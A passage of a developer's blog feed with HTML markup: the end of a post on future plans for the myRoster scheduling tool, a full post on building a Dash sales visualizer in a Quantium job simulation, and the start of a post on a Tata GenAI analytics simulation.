&lt;p&gt;This would transform myRoster from a submission tool into an active communication hub that keeps everyone informed and on track.&lt;/p&gt;




&lt;h3&gt;
  
  
  &lt;strong&gt;2. Robust Backend with Supabase&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Current limitation:&lt;/strong&gt; No persistent user data, authentication, or preferences &lt;br&gt;
&lt;strong&gt;Next evolution:&lt;/strong&gt; Full-stack upgrade with Supabase as the backend&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Features unlocked:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Authentication&lt;/strong&gt;: Secure login with email/password or SSO via EmploymentHero&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;User profiles&lt;/strong&gt;: Save preferred shifts, notification settings, and contact preferences&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Historical data&lt;/strong&gt;: View past submissions, track coverage trends over time&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Saved drafts&lt;/strong&gt;: Start filling out availability, save progress, and return later&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Admin dashboard&lt;/strong&gt;: HR users get real-time coverage analytics, submission status tracking, and bulk operations&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Role-based access control&lt;/strong&gt;: Employees, HR, and managers see different views and capabilities&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Why Supabase?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;PostgreSQL database with real-time subscriptions (perfect for live coverage updates)&lt;/li&gt;
&lt;li&gt;Built-in authentication and row-level security&lt;/li&gt;
&lt;li&gt;RESTful and GraphQL APIs out of the box&lt;/li&gt;
&lt;li&gt;Integrates seamlessly with Python backends&lt;/li&gt;
&lt;li&gt;Free tier suitable for MVP, scales affordably&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Migration path:&lt;/strong&gt; &lt;br&gt;
Current CSV-based workflow becomes a fallback option while Supabase gradually handles user data, preferences, and analytics storage.&lt;/p&gt;




&lt;h3&gt;
  
  
  &lt;strong&gt;3. Machine Learning #1: Pattern Recognition &amp;amp; Predictive Scheduling&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;What it does:&lt;/strong&gt; &lt;br&gt;
Analyze historical availability data to identify patterns in employee behavior, building coverage needs, and seasonal trends. &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Use cases:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Coverage prediction&lt;/strong&gt;: "Based on historical data, Building A typically has low evening shift coverage in December. Flag this 3 weeks in advance."&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Employee behavior insights&lt;/strong&gt;: "User X consistently submits availability on the last day—send them an early reminder."&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Building-specific trends&lt;/strong&gt;: "Building B requires 15% more morning shifts during summer months—adjust recommendations accordingly."&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Anomaly detection&lt;/strong&gt;: Flag unusual submission patterns that might indicate scheduling conflicts or errors&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Technical approach:&lt;/strong&gt; &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Time-series analysis using scikit-learn or Prophet&lt;/li&gt;
&lt;li&gt;Clustering algorithms to group similar availability patterns&lt;/li&gt;
&lt;li&gt;Lightweight models that can run serverless (no heavy infrastructure needed)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Real-world impact:&lt;/strong&gt; &lt;br&gt;
HR teams can proactively address coverage gaps before they become emergencies, and employees get personalized nudges based on their actual behavior patterns.&lt;/p&gt;




&lt;h3&gt;
  
  
  &lt;strong&gt;4. Machine Learning #2: RAG-Powered Knowledge Base&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Inspired by:&lt;/strong&gt; &lt;a href="https://newsletter.nagringa.dev/p/ai-engineering-na-pratica-construindo" rel="noopener noreferrer"&gt;AI Engineering na Prática: Construindo RAG com Neural Networks&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What it does:&lt;/strong&gt; &lt;br&gt;
Build a conversational AI assistant powered by Retrieval-Augmented Generation (RAG) that understands roster policies, shift rules, and employee FAQs.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Employee experience:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;em&gt;"Which shifts do I need to fill for Christmas week?"&lt;/em&gt; 
→ AI retrieves company holiday policies + roster dates and provides personalized guidance&lt;/li&gt;
&lt;li&gt;
&lt;em&gt;"What happens if I can't work my scheduled shift?"&lt;/em&gt; 
→ AI surfaces shift swap procedures, contact info, and deadline policies&lt;/li&gt;
&lt;li&gt;
&lt;em&gt;"Show me my availability history for Q4 2025"&lt;/em&gt; 
→ AI queries the database and presents formatted historical data&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;HR experience:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Automated responses to repetitive questions&lt;/li&gt;
&lt;li&gt;Instant access to shift coverage analytics via natural language queries&lt;/li&gt;
&lt;li&gt;Policy enforcement reminders embedded in the chat experience&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Technical stack:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Vector database&lt;/strong&gt; (Pinecone, Weaviate, or Supabase pgvector) for document embeddings&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;LLM integration&lt;/strong&gt; (OpenAI GPT-4, Claude, or open-source alternatives like Llama)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;RAG framework&lt;/strong&gt; (LangChain or LlamaIndex) for retrieval logic&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Knowledge base&lt;/strong&gt;: Company policies, shift rules, historical data, and FAQs&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Why this is powerful:&lt;/strong&gt; &lt;br&gt;
Instead of just automating form submission, myRoster becomes an intelligent assistant that &lt;em&gt;understands&lt;/em&gt; the nuances of scheduling, reduces HR support burden, and makes policy information instantly accessible. &lt;/p&gt;




&lt;h3&gt;
  
  
  &lt;strong&gt;5. EmploymentHero API Integration&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Current pain point:&lt;/strong&gt; Employees submit via myRoster → HR manually copies CSV data into EmploymentHero &lt;br&gt;
&lt;strong&gt;Automated future:&lt;/strong&gt; Direct API integration eliminates manual data entry entirely&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How it works:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Employee submits availability in myRoster&lt;/li&gt;
&lt;li&gt;System authenticates via EmploymentHero API&lt;/li&gt;
&lt;li&gt;Availability data is automatically synced to the employee's EH profile&lt;/li&gt;
&lt;li&gt;HR sees updated availability directly in their scheduling dashboard—no CSV, no copy-paste, no errors&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Additional benefits:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Bi-directional sync&lt;/strong&gt;: Pull existing shift schedules from EH into myRoster for reference&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Conflict detection&lt;/strong&gt;: Cross-reference submitted availability against existing scheduled shifts&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Deeper insights&lt;/strong&gt;: Combine myRoster's ML analytics with EH's payroll and attendance data for comprehensive workforce planning&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Single source of truth&lt;/strong&gt;: Eliminate data duplication and version control issues&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Technical implementation:&lt;/strong&gt; &lt;br&gt;
EmploymentHero provides a REST API with endpoints for employee data, shift scheduling, and time &amp;amp; attendance. Integration would involve:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;OAuth 2.0 authentication&lt;/li&gt;
&lt;li&gt;Middleware service to translate myRoster data models into EH-compatible formats&lt;/li&gt;
&lt;li&gt;Webhook listeners for real-time updates from EH back to myRoster&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Real-world impact:&lt;/strong&gt; &lt;br&gt;
This closes the loop entirely. What started as "save 15 minutes per employee" becomes "eliminate an entire manual workflow for HR"—potentially saving dozens of hours per roster cycle across the organization.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;Curious about the Timeline? Check my &lt;a href="https://github.com/lfariabr/roster/blob/main/docs/CHANGELOG.md" rel="noopener noreferrer"&gt;CHANGELOG&lt;/a&gt; for a detailed breakdown.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Key Takeaways
&lt;/h2&gt;

&lt;p&gt;This project reinforced principles I apply to every build:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Start with the pain point&lt;/strong&gt;: Every feature traces back to real user frustration&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Ship fast, iterate often&lt;/strong&gt;: MVP in days, not months&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Boring tech wins&lt;/strong&gt;: Streamlit + Pandas = production-ready in hours&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Design for extensibility&lt;/strong&gt;: Modular architecture enables future growth&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Measure impact&lt;/strong&gt;: 90% time reduction is the kind of number that screams ROI&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  Try It Yourself
&lt;/h2&gt;

&lt;p&gt;myRoster is live and open source:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Resource&lt;/th&gt;
&lt;th&gt;Link&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Live Demo&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://myroster.streamlit.app/" rel="noopener noreferrer"&gt;myroster.streamlit.app&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Source Code&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/lfariabr/roster" rel="noopener noreferrer"&gt;github.com/lfariabr/roster&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;If you're building internal tools or automating workflows, I'd love to hear how you approach similar problems.&lt;/p&gt;




&lt;h2&gt;
  
  
  Let's Connect!
&lt;/h2&gt;

&lt;p&gt;Building myRoster has been a perfect example of turning workplace friction into engineering opportunity. If you're:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Automating internal workflows&lt;/li&gt;
&lt;li&gt;Building tools with Streamlit&lt;/li&gt;
&lt;li&gt;Passionate about practical productivity solutions&lt;/li&gt;
&lt;li&gt;Interested in Python automation&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I'd love to connect:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;LinkedIn:&lt;/strong&gt; &lt;a href="https://www.linkedin.com/in/lfariabr/" rel="noopener noreferrer"&gt;linkedin.com/in/lfariabr&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;GitHub:&lt;/strong&gt; &lt;a href="https://github.com/lfariabr" rel="noopener noreferrer"&gt;github.com/lfariabr&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Portfolio:&lt;/strong&gt; &lt;a href="https://luisfaria.dev" rel="noopener noreferrer"&gt;luisfaria.dev&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;strong&gt;Tech Stack Summary:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Current&lt;/th&gt;
&lt;th&gt;Future&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Python, Streamlit, Pandas, Gmail SMTP (GCP)&lt;/td&gt;
&lt;td&gt;Supabase, Resend, OpenAI/RAG, EmploymentHero API, ML (scikit-learn/Prophet)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;p&gt;&lt;em&gt;Built with ☕ and automation by &lt;a href="https://luisfaria.dev" rel="noopener noreferrer"&gt;Luis Faria&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

</description>
      <category>python</category>
      <category>productivity</category>
      <category>automation</category>
      <category>pandas</category>
    </item>
    <item>
      <title>I Built a Sales Visualizer for a Real Business Problem (Quantium Software Engineering Simulation)</title>
      <dc:creator>Luis Faria</dc:creator>
      <pubDate>Mon, 29 Dec 2025 22:22:56 +0000</pubDate>
      <link>https://forem.com/lfariaus/i-built-a-sales-visualizer-for-a-real-business-problem-quantium-software-engineering-simulation-4gfi</link>
      <guid>https://forem.com/lfariaus/i-built-a-sales-visualizer-for-a-real-business-problem-quantium-software-engineering-simulation-4gfi</guid>
      <description>&lt;p&gt;End of the year and I thought it would be a great way to close out 2025 by putting myself through this Software Engineering simulation presented by &lt;a href="https://quantium.com/" rel="noopener noreferrer"&gt;Quantium&lt;/a&gt; on Forage.&lt;/p&gt;

&lt;p&gt;After tackling the &lt;a href="https://dev.to/lfariaus/how-i-tackled-genai-powered-data-analytics-and-unlocked-a-new-perspective-on-ai-strategy-hl8"&gt;Tata GenAI Data Analytics Challenge&lt;/a&gt; and building various data-driven applications, I was ready for another hands-on project. That's when I discovered &lt;strong&gt;Quantium's Software Engineering simulation&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;As someone who loves building practical solutions, I figured this would sharpen my skills in data processing, visualization, and end-to-end application development. Spoiler: it delivered exactly that.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"The best way to learn is by building something real."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Here's my journey of building a production-quality data visualizer from raw CSV files to a polished, interactive Dash application.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Want to jump in yourself?&lt;/strong&gt; Check out the simulation &lt;a href="https://www.theforage.com/simulations/quantium/software-engineering-j6ci" rel="noopener noreferrer"&gt;here&lt;/a&gt; before reading. &lt;strong&gt;SPOILER ALERT&lt;/strong&gt; ahead!&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  The Scenario: Software Engineer at Quantium
&lt;/h2&gt;

&lt;p&gt;The simulation places you in the role of a &lt;strong&gt;software engineer&lt;/strong&gt; at Quantium, working in the financial services business area. Here's the brief:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Client:&lt;/strong&gt; Soul Foods&lt;br&gt;&lt;br&gt;
&lt;strong&gt;Problem:&lt;/strong&gt; Sales decline on their top-performing candy product (Pink Morsels) after a price increase&lt;br&gt;&lt;br&gt;
&lt;strong&gt;Goal:&lt;/strong&gt; Build an interactive data visualizer to answer: "Were sales higher before or after the price increase on January 15, 2021?"&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;This wasn't just a tutorial exercise. This was about &lt;strong&gt;solving a real business question with code&lt;/strong&gt;.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Challenge: Six Progressive Tasks
&lt;/h2&gt;

&lt;p&gt;What I loved about this simulation was the progressive scaffolding. Each task built naturally on the previous one, mirroring how real software projects evolve.&lt;/p&gt;




&lt;h3&gt;
  
  
  Task 1: Set Up Local Development Environment
&lt;/h3&gt;

&lt;p&gt;The first task was all about the fundamentals—forking the repo, setting up a Python virtual environment, and installing dependencies like Dash and Pandas.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The mindset shift:&lt;/strong&gt; Don't underestimate a well-organized workbench. Time invested here pays dividends throughout the project.&lt;/p&gt;




&lt;h3&gt;
  
  
  Task 2: Data Processing — The Art of Reshaping Data
&lt;/h3&gt;

&lt;p&gt;With the environment ready, I tackled three messy CSV files containing transaction data for Soul Foods's entire morsel product line. My job? Transform raw data into actionable insights.&lt;/p&gt;

&lt;p&gt;The transformation pipeline:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Filter:&lt;/strong&gt; Keep only Pink Morsels rows (bye-bye, other products)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Calculate:&lt;/strong&gt; Multiply quantity × price to get &lt;code&gt;Sales&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Normalize:&lt;/strong&gt; Handle currency symbols, parse dates, standardize regions&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Output:&lt;/strong&gt; A clean CSV with just &lt;code&gt;Sales&lt;/code&gt;, &lt;code&gt;Date&lt;/code&gt;, and &lt;code&gt;Region&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I built a robust ETL script with flexible column detection (&lt;code&gt;find_column&lt;/code&gt;) to handle variations in column naming. This kind of defensive coding is essential for real-world data pipelines.&lt;/p&gt;




&lt;h3&gt;
  
  
  Task 3: Create the Dash Application
&lt;/h3&gt;

&lt;p&gt;Now the fun part—bringing data to life! I built a Dash application with:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A clear header explaining the business question&lt;/li&gt;
&lt;li&gt;An interactive line chart showing daily sales over time&lt;/li&gt;
&lt;li&gt;A vertical marker highlighting the price increase date (2021-01-15)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The visualization immediately answered Soul Foods's question—you can literally &lt;em&gt;see&lt;/em&gt; the sales impact.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Key pattern:&lt;/strong&gt; Let the data speak for itself. A simple line chart with a clear annotation was more powerful than any fancy visualization.&lt;/p&gt;




&lt;h3&gt;
  
  
  Task 4: Make It Interactive &amp;amp; Beautiful
&lt;/h3&gt;

&lt;p&gt;Soul Foods wanted to dig into region-specific data. I added:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Radio buttons&lt;/strong&gt; to filter by region (North, East, South, West, or All)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Custom CSS styling&lt;/strong&gt; with a modern, clean aesthetic&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Responsive design&lt;/strong&gt; that works on different screen sizes&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The callback pattern in Dash made this incredibly smooth—select a region, and the chart updates instantly.&lt;/p&gt;




&lt;h3&gt;
  
  
  Task 5: Write a Test Suite
&lt;/h3&gt;

&lt;p&gt;Any production-grade codebase needs robust testing. I created tests to verify:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The header is present&lt;/li&gt;
&lt;li&gt;The visualization graph is rendered&lt;/li&gt;
&lt;li&gt;The region picker is functional&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Using pytest with Dash's testing framework, I built recursive component finders that traverse the layout tree. These tests may seem simple, but they protect against regressions as the codebase evolves.&lt;/p&gt;




&lt;h3&gt;
  
  
  Task 6: Automate Everything with CI
&lt;/h3&gt;

&lt;p&gt;The final task brought it all together with a bash script for continuous integration:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Automatically activates the virtual environment&lt;/li&gt;
&lt;li&gt;Installs dependencies if needed&lt;/li&gt;
&lt;li&gt;Runs the full test suite&lt;/li&gt;
&lt;li&gt;Returns proper exit codes for CI engines&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This is the kind of automation that lets teams ship with confidence.&lt;/p&gt;




&lt;h2&gt;
  
  
  Why This Challenge is Cool?
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;1. Progressive Complexity&lt;/strong&gt;&lt;br&gt;
Each task built naturally on the previous one. By the end, I had context and momentum to make smart architectural decisions.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. Real-World Messiness&lt;/strong&gt;&lt;br&gt;
The data had quirks—currency symbols in price fields, inconsistent column names, multiple input files. This forced me to write defensive, production-quality code.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. End-to-End Ownership&lt;/strong&gt;&lt;br&gt;
From raw CSVs to a deployed application with tests and CI—I touched every layer of the stack.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;4. Practical Business Context&lt;/strong&gt;&lt;br&gt;
The question "Were sales higher before or after the price increase?" is exactly the kind of question real businesses ask. Building tools to answer it felt meaningful.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;5. Modern Stack&lt;/strong&gt;&lt;br&gt;
Dash + Plotly + Pandas is a legitimate toolchain used in production. The skills transfer directly to real projects.&lt;/p&gt;




&lt;h2&gt;
  
  
  What I Built
&lt;/h2&gt;

&lt;p&gt;Here's what I delivered:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Deliverable&lt;/th&gt;
&lt;th&gt;What It Does&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Data Processing Script&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Transforms 3 raw CSVs into a clean, analysis-ready dataset&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Dash Application&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Interactive sales visualizer with region filtering&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Visualization Module&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Plotly line chart with price-increase annotation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Test Suite&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Pytest-based tests verifying core UI components&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;CI Automation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Bash script for automated testing in CI pipelines&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Tech Stack
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Python 3.9&lt;/strong&gt; — The foundation&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Dash&lt;/strong&gt; — Web framework for data applications&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Plotly Express&lt;/strong&gt; — Interactive, beautiful charts&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Pandas&lt;/strong&gt; — Data manipulation powerhouse&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Pytest&lt;/strong&gt; — Testing framework&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Bash&lt;/strong&gt; — CI automation scripting&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;CSS&lt;/strong&gt; — Custom styling for a polished UI&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;👉 &lt;a href="https://github.com/lfariabr/quantium-starter-repo" rel="noopener noreferrer"&gt;My Submitted Repo&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;👉 &lt;a href="https://github.com/vagabond-systems/quantium-starter-repo" rel="noopener noreferrer"&gt;Original Source Code&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Key Takeaways
&lt;/h2&gt;

&lt;p&gt;This challenge reinforced critical principles I apply to every project:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Start with clean data&lt;/strong&gt;: Garbage in, garbage out. Invest in robust ETL.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Let the data speak&lt;/strong&gt;: Simple visualizations often tell better stories than complex ones.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Build for humans&lt;/strong&gt;: A pretty UI isn't vanity—it's usability.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Test early, test often&lt;/strong&gt;: Even simple tests catch real bugs.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Automate the boring stuff&lt;/strong&gt;: CI scripts save hours of manual work.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Modular architecture wins&lt;/strong&gt;: Separating data, viz, and web layers made iteration easy.&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  Try It Yourself
&lt;/h2&gt;

&lt;p&gt;If you'd like to give this challenge a shot:&lt;br&gt;&lt;br&gt;
👉 &lt;a href="https://www.theforage.com/simulations/quantium/software-engineering-j6ci" rel="noopener noreferrer"&gt;Quantium Software Engineering Simulation&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Then come back and tell me:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;How did you style your visualizer?&lt;/li&gt;
&lt;li&gt;What patterns did you discover in the data?&lt;/li&gt;
&lt;li&gt;Did the sales actually go up or down after the price increase? 😏&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Potential Next Steps
&lt;/h2&gt;

&lt;p&gt;The foundation is solid. Here's where this could go:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Enhancement&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Additional Filters&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Add date range pickers or product type selectors&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Statistical Annotations&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Show before/after averages directly on the chart&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Docker Deployment&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Containerize for easy cloud deployment&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Database Backend&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Replace CSV with a proper data store&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Advanced Analytics&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Trend lines, forecasting, anomaly detection&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Final Thoughts
&lt;/h2&gt;

&lt;p&gt;This project stretched me across roles: data engineer, frontend developer, and DevOps practitioner. But that's the point—real software problems don't come in neat boxes.&lt;/p&gt;

&lt;p&gt;I walked away with a working application, clean architecture, and practical experience with a modern data visualization stack. That's the kind of outcome I aim for in every project.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The answer to Soul Foods's question?&lt;/strong&gt; Run the app yourself and find out. The data doesn't lie. 📊&lt;/p&gt;

</description>
      <category>python</category>
      <category>datascience</category>
      <category>webdev</category>
      <category>bash</category>
    </item>
    <item>
      <title>How I Tackled GenAI-Powered Data Analytics (And Unlocked a New Perspective on AI Strategy)</title>
      <dc:creator>Luis Faria</dc:creator>
      <pubDate>Thu, 18 Dec 2025 02:59:27 +0000</pubDate>
      <link>https://forem.com/lfariaus/how-i-tackled-genai-powered-data-analytics-and-unlocked-a-new-perspective-on-ai-strategy-hl8</link>
      <guid>https://forem.com/lfariaus/how-i-tackled-genai-powered-data-analytics-and-unlocked-a-new-perspective-on-ai-strategy-hl8</guid>
      <description>&lt;p&gt;After completing the &lt;a href="https://dev.to/lfariaus/how-i-tackled-the-commonwealths-bank-software-engineering-challenge-3ebk"&gt;Commonwealth Bank Software Engineering Challenge&lt;/a&gt; and my &lt;a href="https://dev.to/lfariaus/scaling-fastier-my-aws-solutions-architect-journey-with-forage-challenge-30j8"&gt;AWS Solutions Architect journey&lt;/a&gt;, I was hungry for the next one. That's when I discovered &lt;strong&gt;Tata's GenAI Powered Data Analytics simulation on Forage&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;As a master's-degree hustler who enjoys stacking tough problems, I figured this would sharpen my edge in AI strategy. Spoiler: it was SO much more than that.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"Comfort is the enemy. Keep moving."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Here's my story of how I tackled a real consulting scenario—predicting delinquency risk, designing ethical AI systems, and building an end-to-end GenAI-powered analytics solution.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Want to jump in yourself?&lt;/strong&gt; Check out the simulation &lt;a href="https://www.theforage.com/simulations/tata/data-analytics-t3zr" rel="noopener noreferrer"&gt;here&lt;/a&gt; before reading. &lt;strong&gt;SPOILER ALERT&lt;/strong&gt; ahead!&lt;/p&gt;
&lt;/blockquote&gt;




